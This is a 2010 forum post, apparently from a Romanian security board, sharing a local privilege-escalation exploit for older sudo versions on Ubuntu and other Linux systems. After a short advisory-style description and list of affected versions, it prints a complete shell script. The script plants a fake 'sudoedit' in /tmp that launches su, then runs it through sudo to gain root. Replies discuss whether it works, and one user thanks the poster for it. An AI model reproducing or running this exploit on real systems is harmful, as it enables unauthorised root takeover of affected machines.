Sudo local root exploit discovered by Slouching

[pyth0n3]

Severity: HIGH

To see if your sudo is vulnerable type

sudo -V

The utility is prone to a local privilege-escalation vulnerability because it fails to correctly validate certain nondefault rules in the 'sudoer' configuration file. This issue occurs in the 'sudo/parse.c' source file. Users in supplementary groups may gain 'root' user privileges.

Local attackers could exploit this issue to run arbitrary commands as the 'root' user. Successful exploits can completely compromise an affected computer.

Affected Products

Ubuntu 6.06 LTS

Ubuntu 8.04 LTS

Ubuntu 8.10

Ubuntu 9.04

Ubuntu 9.10

And also other Linux distribution that use Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4

---snip---
#!/bin/sh
# Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4
# local root exploit
# March 2010
# automated by kingcope
# Full Credits to Slouching
echo Tod Miller Sudo local root exploit
echo by Slouching
echo automated by kingcope
if [ $# != 1 ]
then
echo "usage: ./sudoxpl.sh <file you have permission to edit>"
exit
fi
cd /tmp
cat > sudoedit << _EOF
#!/bin/sh
echo ALEX-ALEX
su
/bin/su
/usr/bin/su
_EOF
chmod a+x ./sudoedit
sudo ./sudoedit $1
--snip---

cheers,
kingcope

Edited March 3, 2010 by pyth0n3

[Xakepatop]

Testat ?i func?ioneaz?. + pyth0n3

[mosulica]

User xxx is not in sudo users list, incident will be reported.

V 1.7.1

[anixus]

mosulica functioneaza doar daca esti adaugat in /etc/sudoers cu drept de editare la un anumit fisier deci in concluzie exploit sux a lot

[Hassan]

mersi aveam nevoie de asa ceva

[mosulica]

atunci baga parola